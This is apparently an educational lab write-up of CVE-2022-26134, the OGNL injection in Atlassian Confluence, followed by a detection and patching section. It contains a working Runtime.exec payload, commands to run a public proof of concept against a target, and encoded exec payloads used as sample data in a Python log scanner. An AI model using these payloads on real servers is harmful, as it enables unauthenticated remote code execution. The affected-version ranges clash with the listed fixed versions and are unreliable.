This article dives into the heart of CVE-2022-26134 and was written strictly for educational purposes. I would like to thank TryHackMe and cmnatic for creating the instance that allowed me to discover and exploit this vulnerability. All the content of this article is a condensation of several sources that also allowed me to deepen my knowledge about this vulnerability.
Summary
- What is Atlassian Confluence?
- NIST Report
- Explaining CVE-2022-26134
- Practical Exploitation
- Exploit Detection & Patching
- Resources
What is Atlassian Confluence?
According to Atlassian, Confluence is a workspace for sharing knowledge and collaborating on team projects. Dynamic pages give your team a place to create, capture and collaborate on projects and ideas. Spaces let you structure, organize and share work, so that every member has visibility into institutional knowledge as well as access to the information needed to do their work.
In short, Confluence is a collaborative documentation and project management framework for teams. Confluence helps track project status by offering a centralised workspace for members.
On May 30th, 2022, the security company Volexity identified an unauthenticated remote code execution (RCE) vulnerability (CVSS score 9.8 on NIST's NVD) in Atlassian's Confluence Server and Data Center editions.
NIST Report
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.
The affected versions are:
• 1.3.0 -> 7.4.17
• 7.13.0 -> 7.13.7
• 7.14.0 -> 7.14.3
• 7.15.0 -> 7.15.2
• 7.16.0 -> 7.16.4
• 7.17.0 -> 7.17.4
• 7.18.0 -> 7.18.1
Explaining CVE-2022-26134
Object-Graph Navigation Language & OGNL Injections
Object-Graph Navigation Language is an open-source expression language for Java that, while using simpler expressions than the full range supported by the Java language, lets you get and set properties and invoke methods of Java classes. In short, OGNL is used for getting and setting properties of Java objects.
For example, OGNL is used to bind front-end elements such as text boxes to back-end objects, and it is used in Java-based web applications such as Confluence. We can see how OGNL is used in the screenshot below: values entered into a web form are stored in objects within the application.
OGNL injection occurs when the Expression Language (EL) interpreter evaluates user-supplied data without validation, enabling attackers to inject their own EL code. That is the core of this vulnerability: input we control ends up being interpreted as OGNL.
Practical Exploitation
Exploitation with curl
To exploit this OGNL injection, we send an HTTP GET request with the payload placed in the URI. For example, we can instruct the Java runtime to execute a command such as creating a file on the server:
${@java.lang.Runtime@getRuntime().exec("touch /tmp/evilfile/")}/
This needs to be URL encoded, as in the snippet below (note that the curl payload must end in a trailing / and not %2F):
Since the server did not return an error code, we can assume it accepted our request. So let's run this exploit written by Nwqda to check that everything works properly and that the server is vulnerable.
Exploitation with PoC by Nwqda
- Clone the repository:
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
- Then you can run the exploit with the command of your choice, as follows:
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"
Here we are: we can now run commands on the server.
So, let’s jump into the Blue Team part.
Exploit Detection and Patching
Detection: Log Files
Confluence runs on Apache Tomcat, whose logs are located in /opt/atlassian/confluence/logs. You can use commands like grep to search the logs for HTTP GET requests whose payloads use the Java runtime to execute commands. For example, in catalina.out:
grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" catalina.out
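The grep above only matches the single-encoded form of one specific payload. The following Python script, added here as an example and not taken from the original article or from any Confluence tooling, generalizes the same check: it pulls the request target out of each access-log line, percent-decodes it repeatedly (so a double-encoded attempt, or one ending in %2F instead of a trailing /, is still normalised), and then rates any ${...} expression by whether it contains OGNL static-call syntax (@class@method() and a process-execution sink). The log lines are constructed samples in a Tomcat-style common log format, not real Confluence logs.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Tomcat "common" log format); not real Confluence logs.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2022:10:15:02 +0000] "GET /login.action HTTP/1.1" 200 4213
10.0.0.9 - - [01/Jun/2022:10:15:07 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/evilfile%22%29%7D/ HTTP/1.1" 302 0
10.0.0.9 - - [01/Jun/2022:10:15:09 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522id%2522%2529%257D%252F HTTP/1.1" 302 0
10.0.0.12 - - [01/Jun/2022:10:16:01 +0000] "GET /display/DOCS/Home?title=${project} HTTP/1.1" 200 9901
10.0.0.7 - - [01/Jun/2022:10:16:30 +0000] "POST /rest/api/content HTTP/1.1" 200 512
"""

# Request line inside the quoted field: "<METHOD> <target> HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# OGNL static-method call syntax: @fully.qualified.Class@method(
OGNL_STATIC_CALL_RE = re.compile(r"@[\w.]+@\w+\s*\(")
# Fragments showing the expression is reaching for process execution.
EXEC_SINKS = ("java.lang.Runtime", "ProcessBuilder", ".exec(")


def fully_decode(target: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so %2524 -> %24 -> $ and %252F -> %2F -> / are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_target(target: str):
    """Return (severity, decoded_target), or None when no OGNL expression is present."""
    decoded = fully_decode(target)
    if "${" not in decoded:
        return None
    if OGNL_STATIC_CALL_RE.search(decoded):
        # Static call plus an execution sink is the CVE-2022-26134 shape.
        if any(sink in decoded for sink in EXEC_SINKS):
            return ("high", decoded)
        return ("medium", decoded)
    # A bare ${...} is worth a look but is not by itself a command-execution attempt.
    return ("low", decoded)


def scan_log(text: str):
    """Scan access-log text; return one finding per request carrying an OGNL expression."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        result = classify_target(m.group("target"))
        if result is None:
            continue
        severity, decoded = result
        findings.append({
            "line": line_no,
            "client": line.split(" ", 1)[0],
            "method": m.group("method"),
            "severity": severity,
            "decoded_target": decoded,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:>3} {f['severity']:<6} {f['client']:<10} {f['method']} {f['decoded_target']}")
```

Run it against a copy of your access log (or pipe catalina.out into scan_log) and triage the "high" findings first; the decoded target in each finding shows exactly which command the request tried to execute, which is the detail the raw encoded log line hides.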
Detection: Yara
If you have Yara installed on the server running Confluence, Volexity (who discovered the vulnerability) has published the following Yara rule:
Patching
Atlassian has released an advisory for their products affected by this CVE, which you can read here. To resolve the issue, you need to upgrade your Confluence version. The suggested list of fixed versions at the time of publication is:
• 7.4.17
• 7.13.7
• 7.14.3
• 7.15.2
• 7.16.4
• 7.17.4
• 7.18.1